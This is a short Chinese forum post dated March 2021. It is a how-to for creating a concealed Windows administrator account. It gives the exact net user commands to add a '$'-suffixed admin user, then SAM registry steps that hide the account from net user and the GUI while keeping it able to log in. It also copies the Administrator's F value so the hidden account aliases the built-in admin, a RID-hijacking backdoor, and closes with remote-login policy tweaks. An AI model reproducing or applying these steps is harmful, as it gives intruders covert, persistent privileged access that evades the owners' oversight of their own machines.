一、net user username1$ password /add net localgroup administrators username1$ /add
二、进入注册表HK_LM\SAM\SAM,授予管理员完全控制权限(最后可取消掉),备份ACCOUNT下对应账户username1$(如3E9)文件和NAME下对应ID文件为REG(后续导入需要),net user 删除username1$用户,而后分别对应导入之前备份的REG文件,此时在net user命令下和GUI下均看不到username1$账户信息,但其可用于登录。为防止其产生用户配置文件,把administrator所对应ID(如1F4)下F值复制粘贴到隐藏账户(3E9)的F值下(本操作之后username1$和administrator算作一个账户,类似别名,不能同时登录)。
三、远程登录,拒绝本地登录,未登录不允许关机,关机警告超时时间。。。
发表于 2021-3-4 22:06:08
